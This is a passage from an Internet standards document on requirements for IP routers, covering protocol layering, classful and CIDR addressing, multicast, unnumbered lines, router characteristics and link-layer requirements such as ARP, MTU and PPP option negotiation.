2.2 Elements of the Architecture

2.2.1 Protocol Layering

To communicate using the Internet system, a host must implement the
layered set of protocols comprising the Internet protocol suite. A
host typically must implement at least one protocol from each layer.

The protocol layers used in the Internet architecture are as follows
[ARCH:7]:

o Application Layer
The Application Layer is the top layer of the Internet protocol
suite. The Internet suite does not further subdivide the
Application Layer, although some application layer protocols do
contain some internal sub-layering. The application layer of the
Internet suite essentially combines the functions of the top two
layers - Presentation and Application - of the OSI Reference Model
[ARCH:8]. The Application Layer in the Internet protocol suite
also includes some of the function relegated to the Session Layer
in the OSI Reference Model.

We distinguish two categories of application layer protocols: user
protocols that provide service directly to users, and support
protocols that provide common system functions. The most common
Internet user protocols are:

- Telnet (remote login)
- FTP (file transfer)
- SMTP (electronic mail delivery)

There are a number of other standardized user protocols and many
private user protocols.

Support protocols, used for host name mapping, booting, and
management include SNMP, BOOTP, TFTP, the Domain Name System (DNS)
protocol, and a variety of routing protocols.

Application Layer protocols relevant to routers are discussed in
chapters 7, 8, and 9 of this memo.

o Transport Layer
The Transport Layer provides end-to-end communication services.
This layer is roughly equivalent to the Transport Layer in the OSI
Reference Model, except that it also incorporates some of OSI's
Session Layer establishment and destruction functions.

There are two primary Transport Layer protocols at present:

- Transmission Control Protocol (TCP)
- User Datagram Protocol (UDP)

TCP is a reliable connection-oriented transport service that
provides end-to-end reliability, resequencing, and flow control.
UDP is a connectionless (datagram) transport service. Other
transport protocols have been developed by the research community,
and the set of official Internet transport protocols may be
expanded in the future.

Transport Layer protocols relevant to routers are discussed in
Chapter 6.

o Internet Layer
All Internet transport protocols use the Internet Protocol (IP) to
carry data from source host to destination host. IP is a
connectionless or datagram internetwork service, providing no
end-to-end delivery guarantees. IP datagrams may arrive at the
destination host damaged, duplicated, out of order, or not at all.
The layers above IP are responsible for reliable delivery service
when it is required. The IP protocol includes provision for
addressing, type-of-service specification, fragmentation and
reassembly, and security.

The datagram or connectionless nature of IP is a fundamental and
characteristic feature of the Internet architecture.

The Internet Control Message Protocol (ICMP) is a control protocol
that is considered to be an integral part of IP, although it is
architecturally layered upon IP - it uses IP to carry its data
end-to-end. ICMP provides error reporting, congestion reporting,
and first-hop router redirection.

The Internet Group Management Protocol (IGMP) is an Internet layer
protocol used for establishing dynamic host groups for IP
multicasting.

The Internet layer protocols IP, ICMP, and IGMP are discussed in
chapter 4.

o Link Layer
To communicate on a directly connected network, a host must
implement the communication protocol used to interface to that
network. We call this a Link Layer protocol.

Some older Internet documents refer to this layer as the Network
Layer, but it is not the same as the Network Layer in the OSI
Reference Model.

This layer contains everything below the Internet Layer and above
the Physical Layer (which is the media connectivity, normally
electrical or optical, which encodes and transports messages).
Its responsibility is the correct delivery of messages, among
which it does not differentiate.

Protocols in this Layer are generally outside the scope of
Internet standardization; the Internet (intentionally) uses
existing standards whenever possible. Thus, Internet Link Layer
standards usually address only address resolution and rules for
transmitting IP packets over specific Link Layer protocols.
Internet Link Layer standards are discussed in chapter 3.

2.2.2 Networks

The constituent networks of the Internet system are required to
provide only packet (connectionless) transport. According to the IP
service specification, datagrams can be delivered out of order, be
lost or duplicated, and/or contain errors.

For reasonable performance of the protocols that use IP (e.g., TCP),
the loss rate of the network should be very low. In networks
providing connection-oriented service, the extra reliability provided
by virtual circuits enhances the end-end robustness of the system,
but is not necessary for Internet operation.

Constituent networks may generally be divided into two classes:

o Local-Area Networks (LANs)
LANs may have a variety of designs. LANs normally cover a small
geographical area (e.g., a single building or plant site) and
provide high bandwidth with low delays. LANs may be passive

(similar to Ethernet) or they may be active (such as ATM).

o Wide-Area Networks (WANs)
Geographically dispersed hosts and LANs are interconnected by
wide-area networks, also called long-haul networks. These
networks may have a complex internal structure of lines and
packet-switches, or they may be as simple as point-to-point
lines.

2.2.3 Routers

In the Internet model, constituent networks are connected together by
IP datagram forwarders which are called routers or IP routers. In
this document, every use of the term router is equivalent to IP
router. Many older Internet documents refer to routers as gateways.

Historically, routers have been realized with packet-switching
software executing on a general-purpose CPU. However, as custom
hardware development becomes cheaper and as higher throughput is
required, special purpose hardware is becoming increasingly common.
This specification applies to routers regardless of how they are
implemented.

A router connects to two or more logical interfaces, represented by
IP subnets or unnumbered point to point lines (discussed in section
[2.2.7]). Thus, it has at least one physical interface. Forwarding
an IP datagram generally requires the router to choose the address
and relevant interface of the next-hop router or (for the final hop)
the destination host. This choice, called relaying or forwarding
depends upon a route database within the router. The route database
is also called a routing table or forwarding table. The term
"router" derives from the process of building this route database;
routing protocols and configuration interact in a process called
routing.

The routing database should be maintained dynamically to reflect the
current topology of the Internet system. A router normally
accomplishes this by participating in distributed routing and
reachability algorithms with other routers.

Routers provide datagram transport only, and they seek to minimize
the state information necessary to sustain this service in the
interest of routing flexibility and robustness.

Packet switching devices may also operate at the Link Layer; such
devices are usually called bridges. Network segments that are
connected by bridges share the same IP network prefix forming a
single IP subnet. These other devices are outside the scope of this

document.

2.2.4 Autonomous Systems

An Autonomous System (AS) is a connected segment of a network
topology that consists of a collection of subnetworks (with hosts
attached) interconnected by a set of routes. The subnetworks and the
routers are expected to be under the control of a single operations
and maintenance (O&M) organization. Within an AS routers may use one
or more interior routing protocols, and sometimes several sets of
metrics. An AS is expected to present to other ASs an appearence of
a coherent interior routing plan, and a consistent picture of the
destinations reachable through the AS. An AS is identified by an
Autonomous System number.

The concept of an AS plays an important role in the Internet routing
(see Section 7.1).

2.2.5 Addressing Architecture

An IP datagram carries 32-bit source and destination addresses, each
of which is partitioned into two parts - a constituent network prefix
and a host number on that network. Symbolically:

IP-address ::= { , }

To finally deliver the datagram, the last router in its path must map
the Host-number (or rest) part of an IP address to the host's Link
Layer address.

2.2.5.1 Classical IP Addressing Architecture

Although well documented elsewhere [INTERNET:2], it is useful to
describe the historical use of the network prefix. The language
developed to describe it is used in this and other documents and
permeates the thinking behind many protocols.

The simplest classical network prefix is the Class A, B, C, D, or E
network prefix. These address ranges are discriminated by observing
the values of the most significant bits of the address, and break the
address into simple prefix and host number fields. This is described
in [INTERNET:18]. In short, the classification is:

0xxx - Class A - general purpose unicast addresses with standard
8 bit prefix
10xx - Class B - general purpose unicast addresses with standard
16 bit prefix

110x - Class C - general purpose unicast addresses with standard
24 bit prefix
1110 - Class D - IP Multicast Addresses - 28 bit prefix, non-
aggregatable
1111 - Class E - reserved for experimental use

This simple notion has been extended by the concept of subnets.
These were introduced to allow arbitrary complexity of interconnected
LAN structures within an organization, while insulating the Internet
system against explosive growth in assigned network prefixes and
routing complexity. Subnets provide a multi-level hierarchical
routing structure for the Internet system. The subnet extension,
described in [INTERNET:2], is a required part of the Internet
architecture. The basic idea is to partition the field
into two parts: a subnet number, and a true host number on that
subnet:

IP-address ::=
{ , , }

The interconnected physical networks within an organization use the
same network prefix but different subnet numbers. The distinction
between the subnets of such a subnetted network is not normally
visible outside of that network. Thus, routing in the rest of the
Internet uses only the part of the IP destination
address. Routers outside the network treat and

together as an uninterpreted rest part of the 32-bit IP
address. Within the subnetted network, the routers use the extended
network prefix:

{ , }

The bit positions containing this extended network number have
historically been indicated by a 32-bit mask called the subnet mask.
The bits SHOULD be contiguous and fall between the

and the fields. More up to date
protocols do not refer to a subnet mask, but to a prefix length; the
"prefix" portion of an address is that which would be selected by a
subnet mask whose most significant bits are all ones and the rest are
zeroes. The length of the prefix equals the number of ones in the
subnet mask. This document assumes that all subnet masks are
expressible as prefix lengths.

The inventors of the subnet mechanism presumed that each piece of an
organization's network would have only a single subnet number. In
practice, it has often proven necessary or useful to have several
subnets share a single physical cable. For this reason, routers
should be capable of configuring multiple subnets on the same

physical interfaces, and treat them (from a routing or forwarding
perspective) as though they were distinct physical interfaces.

2.2.5.2 Classless Inter Domain Routing (CIDR)

The explosive growth of the Internet has forced a review of address
assignment policies. The traditional uses of general purpose (Class
A, B, and C) networks have been modified to achieve better use of
IP's 32-bit address space. Classless Inter Domain Routing (CIDR)
[INTERNET:15] is a method currently being deployed in the Internet
backbones to achieve this added efficiency. CIDR depends on
deploying and routing to arbitrarily sized networks. In this model,
hosts and routers make no assumptions about the use of addressing in
the internet. The Class D (IP Multicast) and Class E (Experimental)
address spaces are preserved, although this is primarily an
assignment policy.

By definition, CIDR comprises three elements:

o topologically significant address assignment,
o routing protocols that are capable of aggregating network layer
reachability information, and
o consistent forwarding algorithm ("longest match").

The use of networks and subnets is now historical, although the
language used to describe them remains in current use. They have
been replaced by the more tractable concept of a network prefix. A
network prefix is, by definition, a contiguous set of bits at the
more significant end of the address that defines a set of systems;
host numbers select among those systems. There is no requirement
that all the internet use network prefixes uniformly. To collapse
routing information, it is useful to divide the internet into
addressing domains. Within such a domain, detailed information is
available about constituent networks; outside it, only the common
network prefix is advertised.

The classical IP addressing architecture used addresses and subnet
masks to discriminate the host number from the network prefix. With
network prefixes, it is sufficient to indicate the number of bits in
the prefix. Both representations are in common use. Architecturally
correct subnet masks are capable of being represented using the
prefix length description. They comprise that subset of all possible
bits patterns that have

o a contiguous string of ones at the more significant end,
o a contiguous string of zeros at the less significant end, and
o no intervening bits.

Routers SHOULD always treat a route as a network prefix, and SHOULD
reject configuration and routing information inconsistent with that
model.

IP-address ::= { , }

An effect of the use of CIDR is that the set of destinations
associated with address prefixes in the routing table may exhibit
subset relationship. A route describing a smaller set of
destinations (a longer prefix) is said to be more specific than a
route describing a larger set of destinations (a shorter prefix);
similarly, a route describing a larger set of destinations (a shorter
prefix) is said to be less specific than a route describing a smaller
set of destinations (a longer prefix). Routers must use the most
specific matching route (the longest matching network prefix) when
forwarding traffic.

2.2.6 IP Multicasting

IP multicasting is an extension of Link Layer multicast to IP
internets. Using IP multicasts, a single datagram can be addressed
to multiple hosts without sending it to all. In the extended case,
these hosts may reside in different address domains. This collection
of hosts is called a multicast group. Each multicast group is
represented as a Class D IP address. An IP datagram sent to the
group is to be delivered to each group member with the same best-
effort delivery as that provided for unicast IP traffic. The sender
of the datagram does not itself need to be a member of the
destination group.

The semantics of IP multicast group membership are defined in
[INTERNET:4]. That document describes how hosts and routers join and
leave multicast groups. It also defines a protocol, the Internet
Group Management Protocol (IGMP), that monitors IP multicast group
membership.

Forwarding of IP multicast datagrams is accomplished either through
static routing information or via a multicast routing protocol.
Devices that forward IP multicast datagrams are called multicast
routers. They may or may not also forward IP unicasts. Multicast
datagrams are forwarded on the basis of both their source and
destination addresses. Forwarding of IP multicast packets is
described in more detail in Section [5.2.1]. Appendix D discusses
multicast routing protocols.

2.2.7 Unnumbered Lines and Networks Prefixes

Traditionally, each network interface on an IP host or router has its
own IP address. This can cause inefficient use of the scarce IP
address space, since it forces allocation of an IP network prefix to
every point-to-point link.

To solve this problem, a number of people have proposed and
implemented the concept of unnumbered point to point lines. An
unnumbered point to point line does not have any network prefix
associated with it. As a consequence, the network interfaces
connected to an unnumbered point to point line do not have IP
addresses.

Because the IP architecture has traditionally assumed that all
interfaces had IP addresses, these unnumbered interfaces cause some
interesting dilemmas. For example, some IP options (e.g., Record
Route) specify that a router must insert the interface address into
the option, but an unnumbered interface has no IP address. Even more
fundamental (as we shall see in chapter 5) is that routes contain the
IP address of the next hop router. A router expects that this IP
address will be on an IP (sub)net to which the router is connected.
That assumption is of course violated if the only connection is an
unnumbered point to point line.

To get around these difficulties, two schemes have been conceived.
The first scheme says that two routers connected by an unnumbered
point to point line are not really two routers at all, but rather two
half-routers that together make up a single virtual router. The
unnumbered point to point line is essentially considered to be an
internal bus in the virtual router. The two halves of the virtual
router must coordinate their activities in such a way that they act
exactly like a single router.

This scheme fits in well with the IP architecture, but suffers from
two important drawbacks. The first is that, although it handles the
common case of a single unnumbered point to point line, it is not
readily extensible to handle the case of a mesh of routers and
unnumbered point to point lines. The second drawback is that the
interactions between the half routers are necessarily complex and are
not standardized, effectively precluding the connection of equipment
from different vendors using unnumbered point to point lines.

Because of these drawbacks, this memo has adopted an alternate
scheme, which has been invented multiple times but which is probably
originally attributable to Phil Karn. In this scheme, a router that
has unnumbered point to point lines also has a special IP address,
called a router-id in this memo. The router-id is one of the

router's IP addresses (a router is required to have at least one IP
address). This router-id is used as if it is the IP address of all
unnumbered interfaces.

2.2.8 Notable Oddities

2.2.8.1 Embedded Routers

A router may be a stand-alone computer system, dedicated to its IP
router functions. Alternatively, it is possible to embed router
functions within a host operating system that supports connections to
two or more networks. The best-known example of an operating system
with embedded router code is the Berkeley BSD system. The embedded
router feature seems to make building a network easy, but it has a
number of hidden pitfalls:

(1) If a host has only a single constituent-network interface, it
should not act as a router.

For example, hosts with embedded router code that gratuitously
forward broadcast packets or datagrams on the same net often
cause packet avalanches.

(2) If a (multihomed) host acts as a router, it is subject to the
requirements for routers contained in this document.

For example, the routing protocol issues and the router control
and monitoring problems are as hard and important for embedded
routers as for stand-alone routers.

Internet router requirements and specifications may change
independently of operating system changes. An administration
that operates an embedded router in the Internet is strongly
advised to maintain and update the router code. This might
require router source code.

(3) When a host executes embedded router code, it becomes part of the
Internet infrastructure. Thus, errors in software or
configuration can hinder communication between other hosts. As
a consequence, the host administrator must lose some autonomy.

In many circumstances, a host administrator will need to disable
router code embedded in the operating system. For this reason,
it should be straightforward to disable embedded router
functionality.

(4) When a host running embedded router code is concurrently used for
other services, the Operation and Maintenance requirements for
the two modes of use may conflict.

For example, router O&M will in many cases be performed remotely
by an operations center; this may require privileged system
access that the host administrator would not normally want to
distribute.

2.2.8.2 Transparent Routers

There are two basic models for interconnecting local-area networks
and wide-area (or long-haul) networks in the Internet. In the first,
the local-area network is assigned a network prefix and all routers
in the Internet must know how to route to that network. In the
second, the local-area network shares (a small part of) the address
space of the wide-area network. Routers that support this second
model are called address sharing routers or transparent routers. The
focus of this memo is on routers that support the first model, but
this is not intended to exclude the use of transparent routers.

The basic idea of a transparent router is that the hosts on the
local-area network behind such a router share the address space of
the wide-area network in front of the router. In certain situations
this is a very useful approach and the limitations do not present
significant drawbacks.

The words in front and behind indicate one of the limitations of this
approach: this model of interconnection is suitable only for a
geographically (and topologically) limited stub environment. It
requires that there be some form of logical addressing in the network
level addressing of the wide-area network. IP addresses in the local
environment map to a few (usually one) physical address in the wide-
area network. This mapping occurs in a way consistent with the { IP
address <-> network address } mapping used throughout the wide-area
network.

Multihoming is possible on one wide-area network, but may present
routing problems if the interfaces are geographically or
topologically separated. Multihoming on two (or more) wide-area
networks is a problem due to the confusion of addresses.

The behavior that hosts see from other hosts in what is apparently
the same network may differ if the transparent router cannot fully
emulate the normal wide-area network service. For example, the
ARPANET used a Link Layer protocol that provided a Destination Dead
indication in response to an attempt to send to a host that was off-
line. However, if there were a transparent router between the

ARPANET and an Ethernet, a host on the ARPANET would not receive a
Destination Dead indication for Ethernet hosts.

2.3 Router Characteristics

An Internet router performs the following functions:

(1) Conforms to specific Internet protocols specified in this
document, including the Internet Protocol (IP), Internet Control
Message Protocol (ICMP), and others as necessary.

(2) Interfaces to two or more packet networks. For each connected
network the router must implement the functions required by that
network. These functions typically include:

o Encapsulating and decapsulating the IP datagrams with the
connected network framing (e.g., an Ethernet header and
checksum),

o Sending and receiving IP datagrams up to the maximum size
supported by that network, this size is the network's Maximum
Transmission Unit or MTU,

o Translating the IP destination address into an appropriate
network-level address for the connected network (e.g., an
Ethernet hardware address), if needed, and

o Responding to network flow control and error indications, if
any.

See chapter 3 (Link Layer).

(3) Receives and forwards Internet datagrams. Important issues in
this process are buffer management, congestion control, and
fairness.

o Recognizes error conditions and generates ICMP error and
information messages as required.

o Drops datagrams whose time-to-live fields have reached zero.

o Fragments datagrams when necessary to fit into the MTU of the
next network.

See chapter 4 (Internet Layer - Protocols) and chapter 5
(Internet Layer - Forwarding) for more information.

(4) Chooses a next-hop destination for each IP datagram, based on the
information in its routing database. See chapter 5 (Internet
Layer - Forwarding) for more information.

(5) (Usually) supports an interior gateway protocol (IGP) to carry
out distributed routing and reachability algorithms with the
other routers in the same autonomous system. In addition, some
routers will need to support an exterior gateway protocol (EGP)
to exchange topological information with other autonomous
systems. See chapter 7 (Application Layer - Routing Protocols)
for more information.

(6) Provides network management and system support facilities,
including loading, debugging, status reporting, exception
reporting and control. See chapter 8 (Application Layer -
Network Management Protocols) and chapter 10 (Operation and
Maintenance) for more information.

A router vendor will have many choices on power, complexity, and
features for a particular router product. It may be helpful to
observe that the Internet system is neither homogeneous nor fully
connected. For reasons of technology and geography it is growing
into a global interconnect system plus a fringe of LANs around the
edge. More and more these fringe LANs are becoming richly
interconnected, thus making them less out on the fringe and more
demanding on router requirements.

o The global interconnect system is composed of a number of wide-area
networks to which are attached routers of several Autonomous
Systems (AS); there are relatively few hosts connected directly to
the system.

o Most hosts are connected to LANs. Many organizations have clusters
of LANs interconnected by local routers. Each such cluster is
connected by routers at one or more points into the global
interconnect system. If it is connected at only one point, a LAN
is known as a stub network.

Routers in the global interconnect system generally require:

o Advanced Routing and Forwarding Algorithms

These routers need routing algorithms that are highly dynamic,
impose minimal processing and communication burdens, and offer
type-of-service routing. Congestion is still not a completely
resolved issue (see Section [5.3.6]). Improvements in these areas
are expected, as the research community is actively working on
these issues.

o High Availability

These routers need to be highly reliable, providing 24 hours a
day, 7 days a week service. Equipment and software faults can
have a wide-spread (sometimes global) effect. In case of failure,
they must recover quickly. In any environment, a router must be
highly robust and able to operate, possibly in a degraded state,
under conditions of extreme congestion or failure of network
resources.

o Advanced O&M Features

Internet routers normally operate in an unattended mode. They
will typically be operated remotely from a centralized monitoring
center. They need to provide sophisticated means for monitoring
and measuring traffic and other events and for diagnosing faults.

o High Performance

Long-haul lines in the Internet today are most frequently full
duplex 56 KBPS, DS1 (1.544 Mbps), or DS3 (45 Mbps) speeds. LANs,
which are half duplex multiaccess media, are typically Ethernet
(10Mbps) and, to a lesser degree, FDDI (100Mbps). However,
network media technology is constantly advancing and higher speeds
are likely in the future.

The requirements for routers used in the LAN fringe (e.g., campus
networks) depend greatly on the demands of the local networks. These
may be high or medium-performance devices, probably competitively
procured from several different vendors and operated by an internal
organization (e.g., a campus computing center). The design of these
routers should emphasize low average latency and good burst
performance, together with delay and type-of-service sensitive
resource management. In this environment there may be less formal
O&M but it will not be less important. The need for the routing
mechanism to be highly dynamic will become more important as networks
become more complex and interconnected. Users will demand more out
of their local connections because of the speed of the global
interconnects.

As networks have grown, and as more networks have become old enough
that they are phasing out older equipment, it has become increasingly
imperative that routers interoperate with routers from other vendors.

Even though the Internet system is not fully interconnected, many
parts of the system need to have redundant connectivity. Rich
connectivity allows reliable service despite failures of
communication lines and routers, and it can also improve service by

shortening Internet paths and by providing additional capacity.
Unfortunately, this richer topology can make it much more difficult
to choose the best path to a particular destination.

2.4 Architectural Assumptions

The current Internet architecture is based on a set of assumptions
about the communication system. The assumptions most relevant to
routers are as follows:

o The Internet is a network of networks.

Each host is directly connected to some particular network(s); its
connection to the Internet is only conceptual. Two hosts on the
same network communicate with each other using the same set of
protocols that they would use to communicate with hosts on distant
networks.

o Routers do not keep connection state information.

To improve the robustness of the communication system, routers are
designed to be stateless, forwarding each IP packet independently
of other packets. As a result, redundant paths can be exploited
to provide robust service in spite of failures of intervening
routers and networks.

All state information required for end-to-end flow control and
reliability is implemented in the hosts, in the transport layer or
in application programs. All connection control information is
thus co-located with the end points of the communication, so it
will be lost only if an end point fails. Routers control message
flow only indirectly, by dropping packets or increasing network
delay.

Note that future protocol developments may well end up putting
some more state into routers. This is especially likely for
multicast routing, resource reservation, and flow based
forwarding.

o Routing complexity should be in the routers.

Routing is a complex and difficult problem, and ought to be
performed by the routers, not the hosts. An important objective
is to insulate host software from changes caused by the inevitable
evolution of the Internet routing architecture.

o The system must tolerate wide network variation.

A basic objective of the Internet design is to tolerate a wide
range of network characteristics - e.g., bandwidth, delay, packet
loss, packet reordering, and maximum packet size. Another
objective is robustness against failure of individual networks,
routers, and hosts, using whatever bandwidth is still available.
Finally, the goal is full open system interconnection: an Internet
router must be able to interoperate robustly and effectively with
any other router or Internet host, across diverse Internet paths.

Sometimes implementors have designed for less ambitious goals.
For example, the LAN environment is typically much more benign
than the Internet as a whole; LANs have low packet loss and delay
and do not reorder packets. Some vendors have fielded
implementations that are adequate for a simple LAN environment,
but work badly for general interoperation. The vendor justifies
such a product as being economical within the restricted LAN
market. However, isolated LANs seldom stay isolated for long.
They are soon connected to each other, to organization-wide
internets, and eventually to the global Internet system. In the
end, neither the customer nor the vendor is served by incomplete
or substandard routers.

The requirements in this document are designed for a full-function
router. It is intended that fully compliant routers will be
usable in almost any part of the Internet.

3. LINK LAYER

Although [INTRO:1] covers Link Layer standards (IP over various link
layers, ARP, etc.), this document anticipates that Link-Layer
material will be covered in a separate Link Layer Requirements
document. A Link-Layer Requirements document would be applicable to
both hosts and routers. Thus, this document will not obsolete the
parts of [INTRO:1] that deal with link-layer issues.

3.1 INTRODUCTION

Routers have essentially the same Link Layer protocol requirements as
other sorts of Internet systems. These requirements are given in
chapter 3 of Requirements for Internet Gateways [INTRO:1]. A router
MUST comply with its requirements and SHOULD comply with its
recommendations. Since some of the material in that document has
become somewhat dated, some additional requirements and explanations
are included below.

DISCUSSION
It is expected that the Internet community will produce a
Requirements for Internet Link Layer standard which will supersede
both this chapter and the chapter entitled "INTERNET LAYER
PROTOCOLS" in [INTRO:1].

3.2 LINK/INTERNET LAYER INTERFACE

This document does not attempt to specify the interface between the
Link Layer and the upper layers. However, note well that other parts
of this document, particularly chapter 5, require various sorts of
information to be passed across this layer boundary.

This section uses the following definitions:

o Source physical address

The source physical address is the Link Layer address of the host
or router from which the packet was received.

o Destination physical address

The destination physical address is the Link Layer address to
which the packet was sent.

The information that must pass from the Link Layer to the
Internetwork Layer for each received packet is:

(1) The IP packet [5.2.2],

(2) The length of the data portion (i.e., not including the Link-
Layer framing) of the Link Layer frame [5.2.2],

(3) The identity of the physical interface from which the IP packet
was received [5.2.3], and

(4) The classification of the packet's destination physical address
as a Link Layer unicast, broadcast, or multicast [4.3.2],
[5.3.4].

In addition, the Link Layer also should provide:

(5) The source physical address.

The information that must pass from the Internetwork Layer to the
Link Layer for each transmitted packet is:

(1) The IP packet [5.2.1]

(2) The length of the IP packet [5.2.1]

(3) The destination physical interface [5.2.1]

(4) The next hop IP address [5.2.1]

In addition, the Internetwork Layer also should provide:

(5) The Link Layer priority value [5.3.3.2]

The Link Layer must also notify the Internetwork Layer if the packet
to be transmitted causes a Link Layer precedence-related error
[5.3.3.3].

3.3 SPECIFIC ISSUES

3.3.1 Trailer Encapsulation

Routers that can connect to ten megabit Ethernets MAY be able to
receive and forward Ethernet packets encapsulated using the trailer
encapsulation described in [LINK:1]. However, a router SHOULD NOT
originate trailer encapsulated packets. A router MUST NOT originate
trailer encapsulated packets without first verifying, using the
mechanism described in [INTRO:2], that the immediate destination of
the packet is willing and able to accept trailer-encapsulated
packets. A router SHOULD NOT agree (using these mechanisms) to
accept trailer-encapsulated packets.

3.3.2 Address Resolution Protocol - ARP

Routers that implement ARP MUST be compliant and SHOULD be
unconditionally compliant with the requirements in [INTRO:2].

The link layer MUST NOT report a Destination Unreachable error to IP
solely because there is no ARP cache entry for a destination; it
SHOULD queue up to a small number of datagrams breifly while
performing the ARP request/reply sequence, and reply that the
destination is unreachable to one of the queued datagrams only when
this proves fruitless.

A router MUST not believe any ARP reply that claims that the Link
Layer address of another host or router is a broadcast or multicast
address.

3.3.3 Ethernet and 802.3 Coexistence

Routers that can connect to ten megabit Ethernets MUST be compliant
and SHOULD be unconditionally compliant with the Ethernet
requirements of [INTRO:2].

3.3.4 Maximum Transmission Unit - MTU

The MTU of each logical interface MUST be configurable within the
range of legal MTUs for the interface.

Many Link Layer protocols define a maximum frame size that may be
sent. In such cases, a router MUST NOT allow an MTU to be set which
would allow sending of frames larger than those allowed by the Link
Layer protocol. However, a router SHOULD be willing to receive a
packet as large as the maximum frame size even if that is larger than
the MTU.

DISCUSSION
Note that this is a stricter requirement than imposed on hosts by
[INTRO:2], which requires that the MTU of each physical interface
be configurable.

If a network is using an MTU smaller than the maximum frame size
for the Link Layer, a router may receive packets larger than the
MTU from misconfigured and incompletely initialized hosts. The
Robustness Principle indicates that the router should successfully
receive these packets if possible.

3.3.5 Point-to-Point Protocol - PPP

Contrary to [INTRO:1], the Internet does have a standard point to
point line protocol: the Point-to-Point Protocol (PPP), defined in
[LINK:2], [LINK:3], [LINK:4], and [LINK:5].

A point to point interface is any interface that is designed to send
data over a point to point line. Such interfaces include telephone,
leased, dedicated or direct lines (either 2 or 4 wire), and may use
point to point channels or virtual circuits of multiplexed interfaces
such as ISDN. They normally use a standardized modem or bit serial
interface (such as RS-232, RS-449 or V.35), using either synchronous
or asynchronous clocking. Multiplexed interfaces often have special
physical interfaces.

A general purpose serial interface uses the same physical media as a
point to point line, but supports the use of link layer networks as
well as point to point connectivity. Link layer networks (such as
X.25 or Frame Relay) use an alternative IP link layer specification.

Routers that implement point to point or general purpose serial
interfaces MUST IMPLEMENT PPP.

PPP MUST be supported on all general purpose serial interfaces on a
router. The router MAY allow the line to be configured to use point
to point line protocols other than PPP. Point to point interfaces
SHOULD either default to using PPP when enabled or require
configuration of the link layer protocol before being enabled.
General purpose serial interfaces SHOULD require configuration of the
link layer protocol before being enabled.

3.3.5.1 Introduction

This section provides guidelines to router implementors so that they
can ensure interoperability with other routers using PPP over either
synchronous or asynchronous links.

It is critical that an implementor understand the semantics of the
option negotiation mechanism. Options are a means for a local device
to indicate to a remote peer what the local device will accept from
the remote peer, not what it wishes to send. It is up to the remote
peer to decide what is most convenient to send within the confines of
the set of options that the local device has stated that it can
accept. Therefore it is perfectly acceptable and normal for a remote
peer to ACK all the options indicated in an LCP Configuration Request
(CR) even if the remote peer does not support any of those options.
Again, the options are simply a mechanism for either device to
indicate to its peer what it will accept, not necessarily what it
will send.

3.3.5.2 Link Control Protocol (LCP) Options

The PPP Link Control Protocol (LCP) offers a number of options that
may be negotiated. These options include (among others) address and
control field compression, protocol field compression, asynchronous
character map, Maximum Receive Unit (MRU), Link Quality Monitoring
(LQM), magic number (for loopback detection), Password Authentication
Protocol (PAP), Challenge Handshake Authentication Protocol (CHAP),
and the 32-bit Frame Check Sequence (FCS).

A router MAY use address/control field compression on either
synchronous or asynchronous links. A router MAY use protocol field
compression on either synchronous or asynchronous links. A router
that indicates that it can accept these compressions MUST be able to
accept uncompressed PPP header information also.

DISCUSSION
These options control the appearance of the PPP header. Normally
the PPP header consists of the address, the control field, and the
protocol field. The address, on a point to point line, is 0xFF,
indicating "broadcast". The control field is 0x03, indicating
"Unnumbered Information." The Protocol Identifier is a two byte
value indicating the contents of the data area of the frame. If a
system negotiates address and control field compression it
indicates to its peer that it will accept PPP frames that have or
do not have these fields at the front of the header. It does not
indicate that it will be sending frames with these fields removed.

Protocol field compression, when negotiated, indicates that the
system is willing to receive protocol fields compressed to one
byte when this is legal. There is no requirement that the sender
do so.

Use of address/control field compression is inconsistent with the
use of numbered mode (reliable) PPP.

IMPLEMENTATION
Some hardware does not deal well with variable length header
information. In those cases it makes most sense for the remote
peer to send the full PPP header. Implementations may ensure this
by not sending the address/control field and protocol field
compression options to the remote peer. Even if the remote peer
has indicated an ability to receive compressed headers there is no
requirement for the local router to send compressed headers.

A router MUST negotiate the Asynchronous Control Character Map (ACCM)
for asynchronous PPP links, but SHOULD NOT negotiate the ACCM for
synchronous links. If a router receives an attempt to negotiate the
ACCM over a synchronous link, it MUST ACKnowledge the option and then
ignore it.

DISCUSSION
There are implementations that offer both synchronous and
asynchronous modes of operation and may use the same code to
implement the option negotiation. In this situation it is
possible that one end or the other may send the ACCM option on a
synchronous link.

A router SHOULD properly negotiate the maximum receive unit (MRU).
Even if a system negotiates an MRU smaller than 1,500 bytes, it MUST
be able to receive a 1,500 byte frame.

A router SHOULD negotiate and enable the link quality monitoring
(LQM) option.

DISCUSSION
This memo does not specify a policy for deciding whether the
link's quality is adequate. However, it is important (see Section
[3.3.6]) that a router disable failed links.

A router SHOULD implement and negotiate the magic number option for
loopback detection.

A router MAY support the authentication options (PAP - Password
Authentication Protocol, and/or CHAP - Challenge Handshake
Authentication Protocol).

A router MUST support 16-bit CRC frame check sequence (FCS) and MAY
support the 32-bit CRC.

3.3.5.3 IP Control Protocol (IPCP) Options

A router MAY offer to perform IP address negotiation. A router MUST
accept a refusal (REJect) to perform IP address negotiation from the
peer.

Routers operating at link speeds of 19,200 BPS or less SHOULD
implement and offer to perform Van Jacobson header compression.
Routers that implement VJ compression SHOULD implement an
administrative control enabling or disabling it.

3.3.6 Interface Testing

A router MUST have a mechanism to allow routing software to determine
whether a physical interface is available to send packets or not; on
multiplexed interfaces where permanent virtual circuits are opened
for limited sets of neighbors, the router must also be able to
determine whether the virtual circuits are viable. A router SHOULD
have a mechanism to allow routing software to judge the quality of a
physical interface. A router MUST have a mechanism for informing the
routing software when a physical interface becomes available or
unavailable to send packets because of administrative action. A
router MUST have a mechanism for informing the routing software when
it detects a Link level interface has become available or
unavailable, for any reason.

DISCUSSION
It is crucial that routers have workable mechanisms for
determining that their network connections are functioning
properly. Failure to detect link loss, or failure to take the
proper actions when a problem is detected, can lead to black
holes.

The mechanisms available for detecting problems with network
connections vary considerably, depending on the Link Layer
protocols in use and the interface hardware. The intent is to
maximize the capability to detect failures within the Link-Layer
constraints.

4. INTERNET LAYER - PROTOCOLS

4.1 INTRODUCTION

This chapter and chapter 5 discuss the protocols used at the Internet
Layer: IP, ICMP, and IGMP. Since forwarding is obviously a crucial
topic in a document discussing routers, chapter 5 limits itself to
the aspects of the protocols that directly relate to forwarding. The
current chapter contains the remainder of the discussion of the
Internet Layer protocols.

4.2 INTERNET PROTOCOL - IP

4.2.1 INTRODUCTION

Routers MUST implement the IP protocol, as defined by [INTERNET:1].
They MUST also implement its mandatory extensions: subnets (defined
in [INTERNET:2]), IP broadcast (defined in [INTERNET:3]), and
